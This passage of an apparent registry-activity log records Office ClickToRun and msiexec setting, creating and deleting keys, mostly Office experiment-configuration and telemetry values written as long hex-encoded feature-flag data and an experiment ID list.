722e4c696d6974546f4f6e654175746f446973636f766572222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f446973636f7665722e4f6e6c795573654874747073222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e426f6f7449646c655468726f74746c6572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4275674669782e506572736f6e61436f6e74726f6c4261636b67726f756e64436f6c6f72222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4368616e6765476174652e44656c617943757272656e745549416374697665506c616365557064617465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4372634261736564556964222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|3" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|8" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigIds = "std::wstring|P-R-1098158-1-5,P-R-76757-1-2,P-R-54903-1-3,P-R-26146-7-17,P-D-29635-1-1,P-D-27087-1-9,P-R-79688-1-3,P-R-53532-1-5,P-R-51436-1-6,P-R-51427-18-12,P-R-40464-18-9,P-X-98518-6-9,P-R-38390-18-21,blockedgraphicsadapter5:475899,P-R-35099-2-4,P-R-61408-18-3,P-R-55746-2-5,P-R-53512-1-4,P-R-46974-18-18,P-R-38953-1-11,P-R-36551-18-18,P-R-71414-1-6,P-R-40253-6-19,P-R-40254-6-18,P-R-35401-6-7,P-R-32107-22-22,P-R-39146-14-15,P-R-39147-14-20,P-R-28546-6-11,P-R-28165-6-28,P-R-24980-8-48,P-R-24390-5-12,P-R-18279-2-65,P-D-34200-4-5,P-R-51145-2-7,P-R-29928-2-20,P-R-67932-1-4,P-R-67201-1-4,P-R-64545-1-4,P-R-64035-1-4,P-R-53515-18-9,P-R-53280-1-6,P-R-52247-1-5,P-R-51958-1-5,P-R-51842-1-5,P-R-51277-2-6,P-R-47451-18-20,P-R-45919-18-19,P-R-45085-18-12,P-R-41442-18-18,P-R-38085-12-9,P-R-18744-6-22,P-D-34239-1-6,P-R-1034169-10-7,P-E-28677-C1-3,P-R-55122-8-8,P-R-50255-10-9,P-R-44907-1-9,P-R-45314-10-16,P-R-44965-2-6,P-X-1240823-2-3,P-E-38231-2-4,P-R-1245662-16-4,P-R-94560-14-12,P-R-94189-14-13,P-R-93882-14-26,P-R-54728-16-23,P-R-54698-16-16,P-R-54658-18-19,P-R-38306-18-3,P-R-35717-5-30,P-R-34019-4-3,win32devicecanarycf:541484,win32devicecanarycf:541484,P-X-53845-1-9,P-X-53772-1-3,P-X-51790-1-3,P-E-42700-C1-4,P-R-1025232-24-9,P-R-71358-1-4,P-R-70941-1-4,P-R-69065-1-3,P-R-67160-1-7,P-R-59781-1-4,P-R-55631-1-4,P-R-54215-1-4,P-R-53751-1-4,P-R-53752-1-4,P-R-53526-1-4,P-R-52110-1-4,P-R-49765-15-32,P-R-48818-17-25,P-R-50679-1-4,P-R-50486-18-12,P-R-44830-18-13,P-R-49416-4-14,P-R-48457-2-6,P-R-47974-16-18,P-R-46544-18-11,P-R-45609-14-6,P-R-45197-2-6,P-R-44046-18-11,P-R-44015-18-20,P-R-43723-2-6,P-R-41742-18-32,P-R-40980-18-16,P-R-40359-2-10,P-R-39029-5-18,P-R-38835-18-48,P-R-37676-18-46,P-R-36310-4-5,P-R-35945-10-5,P-R-35165-2-7,P-R-35143-4-4,P-R-33553-4-6,P-R-33536-12-13,P-R-29809-1-7,P-R-26968-3-9,fiser190:377704,happy03172020-1:61977,happy02062020-0:28428,P-R-53545-4-5,P-R-50711-18-11,P-R-49736-6-22,P-R-48467-18-18,P-R-32106-7-33,P-R-30085-1-9,P-R-29138-38-83,P-R-29315-36-69,P-R-25009-1-8,P-R-24363-1-13,P-R-21631-10-64,P-R-19898-1-22,P-R-19814-1-62,P-R-19012-1-57,P-X-50220-1-3,P-X-49730-1-3,P-R-69347-1-5,P-R-64574-1-4,P-R-54116-1-4,P-R-53585-18-18,P-R-52594-18-5,P-R-52386-1-4,P-R-50980-2-4,P-R-50938-1-4,P-R-50152-18-20,P-R-49175-18-22,P-R-47260-18-23,P-R-44156-18-26,P-R-43284-18-19,P-R-43285-12-22,P-R-42482-1-4,P-R-40990-12-15,P-R-39333-18-28,P-R-35439-12-21,P-R-33215-18-19,P-R-31352-12-25,P-D-34269-2-5,gruse488:570358,grico406:19777,P-R-49830-18-15,P-R-40586-18-27,P-R-32996-18-24,P-D-40316-9-5,P-R-50429-18-8,P-R-65295-18-30,P-R-61861-1-4,P-R-61737-1-4,P-R-51777-18-8,P-R-50920-1-6,P-R-50366-18-19,P-R-35985-14-23,P-R-35891-18-5,P-R-32004-2-5,P-R-68336-2-4,P-R-67286-2-6,P-R-51513-2-4,P-R-79963-1-2,P-R-52043-1-3,P-R-51764-1-4,P-R-49388-2-6,P-R-48335-4-16,P-R-47308-3-9,P-R-42392-2-4,P-R-39073-1-5,P-R-1123376-10-10,P-R-1009855-12-14,P-R-98856-18-48,P-R-43489-30-13,P-R-38410-12-23,P-X-1019581-1-3,P-X-1006174-1-5,P-R-66436-1-4,P-R-62873-1-4,P-R-51097-1-5,P-R-50706-18-7,P-R-50055-18-7,P-R-49315-18-5,P-R-42660-18-35,P-R-36649-8-9,oemic639:397753,oeall843:375887,P-R-42379-2-3,P-R-42378-2-3,P-R-66539-1-4,P-R-66538-1-4,P-R-65278-1-4,P-R-65279-1-4,P-R-59180-1-4,P-R-48070-1-5,P-R-47386-1-4,P-R-55342-2-2,P-R-53377-2-6,P-R-52481-2-5,P-R-49759-2-8,P-R-46100-20-9,P-R-38510-2-10,P-R-37550-20-13,P-R-32186-C27-29,P-R-58135-2-4,P-R-56618-1-3,P-R-56027-1-4,P-R-61718-18-3,P-R-46145-18-18,P-R-33892-1-8,P-R-33696-1-5,P-R-55749-1-4,P-R-53662-1-4,P-R-52246-1-4,P-R-52245-1-4,P-R-52238-1-5,P-R-43644-6-13,P-R-39912-1-2,P-R-39283-4-10,P-R-50380-18-18,P-R-50379-18-17,P-R-68146-1-5,P-R-63409-1-5,P-R-50542-18-14,P-R-50500-18-16,P-R-48365-18-24,P-R-48161-18-32,P-R-46597-1-4,P-R-33737-1-4,P-E-29662-C1-3,P-R-29303-2-20,P-R-56654-2-4,P-R-53256-2-11,P-R-51703-1-5,P-R-50133-2-9,P-R-47242-18-11,P-R-46410-1-5,P-R-45550-C17-46,P-R-45490-16-9,P-R-44885-18-20,P-R-42512-1-3,P-R-40169-8-13,P-R-39700-2-7,P-R-32143-5-18,P-R-37313-18-22,P-R-36664-4-4,P-R-35476-2-5,P-R-35407-4-3,P-R-35237-14-11,P-R-35150-2-4,P-R-35129-2-4,P-R-35056-4-5,P-R-34889-8-4,P-R-34044-2-4,P-R-33718-6-5,P-R-33459-1-5,P-R-30292-4-7,P-R-28644-1-4,P-R-24037-1-7,P-R-23445-3-7,P-R-23434-3-7,P-R-23403-3-8,P-R-18513-1-30,P-D-34699-4-4,P-D-34697-2-4,P-D-34675-1-4,P-D-34673-1-4,P-D-34654-1-4,P-D-34587-3-5,P-D-34266-1-4,P-D-34262-1-5,P-D-34260-1-5,P-D-34258-2-5,P-D-32465-1-5,P-D-32459-2-4,P-D-32458-5-4,P-X-1083427-2-5,P-R-69529-1-5,P-R-65011-1-3,P-R-53622-18-4,P-R-50541-2-7,P-R-49893-22-9,P-R-36932-2-13,jh8ab447:380633,P-R-69232-18-13,P-R-23681-2-7,P-D-32502-2-3,P-D-32501-2-3,P-D-32415-2-3,P-R-64513-18-11,P-R-51916-84-31,P-R-1267084-2-5,P-R-1258784-1-3,P-R-1245296-4-6,P-R-1236953-2-4,P-R-1175793-1-3,P-R-1157570-2-4,P-R-1132821-2-4,P-R-1119013-1-3,P-R-1098796-1-3,P-R-1094445-1-3,P-R-1080412-1-3,P-R-1069769-2-4,P-R-1068115-1-3,P-R-1045118-2-4,P-R-25269-14-21,P-R-1044408-1-3,P-R-1044141-7-9,P-R-1037887-1-3,P-R-1037879-1-3,P-R-1036293-1-3,P-R-1036292-1-3,P-R-1036289-2-4,P-R-1036288-1-3,P-R-1036068-2-4,P-R-1035933-2-4,P-R-1035149-2-4,P-R-1033817-1-3,P-R-1028168-1-3,P-R-1009717-3-5,P-R-1000061-2-4,P-R-117548-2-4,P-R-111682-1-3,P-R-105731-36-38,P-R-104435-13-15,P-R-100294-1-3,P-R-99633-1-3,P-R-98929-2-4,P-R-98250-1-3,P-R-94299-1-3,P-R-93077-1-3,P-R-86118-1-3,P-R-80517-7-9,P-R-78112-4-6,P-R-77140-2-4,P-R-76918-2-4,P-R-76721-1-3,P-R-75440-2-4,P-R-73676-1-3,P-R-72449-7-10,P-R-72030-4-6,P-R-68069-2-4,P-R-66975-1-3,P-R-65567-1-3,P-R-62212-2-4,P-R-60602-3-5,P-R-52633-1-3,P-R-52171-2-4,P-R-52011-2-4,P-R-51921-8-10,P-R-51258-8-10,P-R-50752-2-4,P-R-50681-2-4,P-R-50599-4-6,P-R-50596-4-8,P-R-50553-1-3,P-R-49597-3-5,P-R-49458-2-4,P-R-48530-7-9,P-R-47948-1-4,P-R-46580-3-5,P-R-46484-10-12,P-R-46122-1-3,P-R-45858-2-4,P-R-43966-2-4,P-R-43502-19-21,P-R-38248-19-23,P-R-41430-1-3,P-R-40751-8-10,P-R-40273-4-6,P-R-39238-5-7,P-R-38682-3-5,P-R-37588-2-4,P-R-34355-8-10,P-R-26266-4-9,P-R-26834-3-8,P-R-24662-16-22,P-R-27479-6-11,P-R-26056-7-15,P-R-27006-7-12,P-R-30338-3-7,P-R-30178-79-81,P-R-30053-8-10,P-R-27458-1-5,P-R-25822-16-19,P-R-25083-6-9,P-R-24690-42-46,P-R-24689-2-5,P-R-24666-2-5,P-R-24663-6-11,P-R-24659-7-10,P-R-23744-7-9,P-R-23739-7-9,P-R-23736-14-17,P-R-23734-7-9,P-R-23730-21-24,P-R-23723-10-12,P-D-32588-1-3,P-D-32534-1-3,P-D-32524-1-3,P-D-32518-1-3,P-D-32512-1-3,P-D-32509-1-3,P-D-32485-1-4,P-D-32484-1-4,P-D-32405-1-3,P-R-1087141-4-7,P-R-49160-12-12,P-R-47601-18-13,P-R-46834-12-14,P-R-46202-18-11,P-R-44018-18-13,P-R-43355-18-12,P-R-35337-16-7,P-R-33916-1-5,P-R-33580-8-9,P-X-117400-1-3,P-R-59175-18-4,P-R-53292-14-10,P-R-49130-18-23,P-R-46913-18-8,P-R-37449-18-15,uxmediumiconluminance:353455,P-R-48549-18-11,P-R-19262-1-12,P-E-44774-2-9,P-R-44869-16-16,P-R-33918-1-11,P-R-1128630-1-7,P-R-1098412-1-5,P-R-1091267-1-51,P-R-81720-1-2,P-R-58406-1-5,P-D-50697-2-4,P-D-29719-1-1,P-D-29718-1-1,P-D-29593-1-6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ETag = "std::wstring|\"1CsAILylG9NZlBGtLHQ8OHhk9mHTuJ1YMNlmpEv6dn8=\"" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2C C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.1 = 636573732e4669785468656d654368616e676551727952657061696e74222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4163636573732e4c696e6b65645461626c654d616e616765722e536561726368222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4163636573732e5175657279496d70726f76656d656e7473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4163636573732e5175657279496d70726f76656d656e74732e45434c4d756c746953656c656374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e436f6d62696e654261636b656e6444696d656e73696f6e436f6d6d616e6473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4175674c6f6f702e4c6963656e73654665617475726573456e61626c65644f72436865636b222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4175674c6f6f702e576f726b666c6f7744697361626c65642e5265706c6163654f626a656374576f726b666c6f77222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4358452e48696464656e466f6e74734d736f466f6e745069636b657257696e3332222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e416c6c6f7753657456616c756573576974686f7574457863656c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e4368616e6765476174652e46436c6561724d6f6e696b6572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e436f6c6c656374536861706550726f7073427567466978222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e4d6170436861727459656c6c6f7744617461222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e5069766f744368617274496e7665727446696c6c427567466978222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e536c69646553686f7748696465546f6f6c74697073222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e417070564d61785265747279436f756e74222c20225622203a2022696e7433325f747c313422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e417070564d6178526574727954696d654c696d6974222c20225622203a2022696e7433325f747c363030303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e417070565265747279496e74657276616c222c20225622203a2022696e7433325f747c3230303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655265666163746f72656453687574646f776e50726f636573736573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655465616d734164646f6e222c20225622203a20227374643a3a77737472696e677c656e61626c656422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655465616d734f6e557064617465427573696e657373222c20225622203a20227374643a3a77737472696e677c656e61626c656422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655465616d734f6e55706461746550726f506c7573222c20225622203a20227374643a3a77737472696e677c656e61626c656422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e4164646974696f6e616c4461746154797065456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e426c6f636b466565646261636b457870657269656e636542617365644f6e5072697661637953657474696e6773222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e426c6f636b537572766579457870657269656e636542617365644f6e5072697661637953657474696e6773222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e436f686572656e6365457870657269656e6365456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e446961676e6f73746963735341532e55706c6f6164657254797065222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e456e61626c65466565646261636b5632536368656d61222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e466565646261636b446973616d626967756174696f6e53637265656e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e486f73746564466565646261636b5461736b50616e65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e486f73746564537572766579456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e536173466565646261636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446961676e6f73746963732e44697361626c654661737446696c746572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e414354522e5468726f74746c654361706163697479222c20225622203a2022696e7433325f747c313022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e414354522e5468726f74746c65496e74657276616c4d736563222c20225622203a2022696e7433325f747c3130303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4261636b7374616765496e6170704e61765632456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e49735265706c7954696d657374616d704c6f6767696e67456e61626c6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e4a53476174652e4e657743617264426f7264657273222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e4a53476174652e50616e65546162466f6375734669786573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e50726f636573734368616e676573496e766f6b65456c7365506f7374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d736f2e4f757453706163652e446570726563617465536574496d6167654173796e63222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4f666669636553746172742e466978466f7241444f33393032343239222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4f757453706163652e536861726564576974684d652e44697361626c65446f63756d656e74735265717565737449665573696e674167674d7275222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e436865636b41637469766974794c6f67546f456e61626c654d656e74696f6e73222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e456e61626c655369746573467269656e646c7950617468222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e486973746f72794c6567616379436c65616e7570456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e486973746f7279556e696f6e466978456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e486f6d65506167652e436f6c6c61707369626c65536c616273222c20225622203a2022696e7433325f747c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e496e4170704e61762e43726561746552656e616d6544656c657465222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4d736f2e4f666669636553746172742e466978466f7241444f333838363036375632222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4f44656c74612e53747265616d4d6f6465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e576f7069222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e4361636865457870697279496e4d696e222c20225622203a2022696e7433325f747c37323022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e436f6e666967496444656c696d69746572496e4c6f67222c20225622203a20227374643a3a77737472696e677c3b22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e436f6e6669674c6f67546172676574222c20225622203a20227374643a3a77737472696e677c64656661756c7422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e44697361626c65436f6e6669674c6f67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e456e61626c65536d61727445546167222c20225622203a2022696e7433325f747c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e454353546573742e746573747661726961626c65222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e496e7369676874732e456e61626c65436f6d706c65785069766f745461626c65496e5069766f745461626c655265636f6d6d656e646572222c20225622203a20224d736f3a3a416e79547970657c75696e7431365f747c323b626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e496e7369676874732e456e61626c655069766f745461626c655265636f6d6d656e646572222c20225622203a20224d736f3a3a416e79547970657c75696e7431365f747c323b626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e496e7369676874732e5069766f745461626c655265636f6d6d656e64657252616e6b65725632222c20225622203a20224d736f3a3a416e79547970657c75696e7431365f747c323b626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e4e616d656453686565745669657750657273697374656e6365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e536f72744f626a4d616e6167656d656e74222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e436f6e66696746657463684d616e61676572456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e44796e616d6963447069222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e457870466972737453657373696f6e5461736b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e4665617475726551756572794c6f676765722e456e61626c655374617469634c6f6767696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e5472696d41707049644c697374546f4665746368222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e57696e333244657669636543616e617279222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e416c7761797346616c6c6261636b466f7253796e634261636b6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e44657072656361746546696c65536572766572496e666f54797065222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e456e61626c654261636b67726f756e6455706c6f6164222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e5573654e65774d736f446f6354656c656d65747279496e697450617468222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e436865636b5265766973696f6e53747265616d457175616c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e436f6c6c616250726f7053746f726543616368655265736574436865636b6572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e436f7079546f43616c6c6261636b456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4373694c696d6974656446616c6c6261636b546f486c696e6b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e44534c49422e456e61626c654c6162656c73556e757365644f72436c6561726564436865636b222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446570726563617465436865636b5374617274735769746846696c654e616d65457869737473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446973616d626967756174654373694e6574776f726b436f6e6e65637469766974794572726f72222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446973636f52657472795374726174656779222c20225622203a2022696e7433325f747c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446973636f5374726963744d6f6465456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446f63732e4d736f2e4f757473706163652e496e6974436163686546726f6d464948222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4472675570646174655265666572656e63657353796368726f6e6f7573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e44796e616d6963467261676d656e7453697a65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e456e61626c65466f726365486f73744d6f6465466f7253796e634261636b6564486f73744f6e C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.2 = 4f70656e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4661696c43616c6c73546f5472616e73616374656453747265616d446174614265666f72654373694c6f616446696c65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4872446f776e6c6f616454656d704173796e634c4d54222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e496e637265617365644279746573427566666572657257696e646f7753697a65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e496e6372656d656e74616c4f70656e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4973496e74656c6c6967656e745361766550726f6d7074537572766579456e61626c6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e49734f70656e4572726f724469616c6f6741626c65546f42654f76657272696464656e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4c6f636174696f6e5069636b65725468726565446f74222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4e65766572466f726365486f73744d6f6465496e436f6c6c61625265636f6e63696c6174696f6e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4f63735072656665746368496e7465726e616c436f6f7264696e6174696f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4f637369576f726b696e67436f7079577269746546696c654d61785265747279436f756e74222c20225622203a2022696e7433325f747c3522207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4f637369576f726b696e67436f7079577269746546696c655265747279496e74657276616c496e4d696c6c697365636f6e6473222c20225622203a2022696e7433325f747c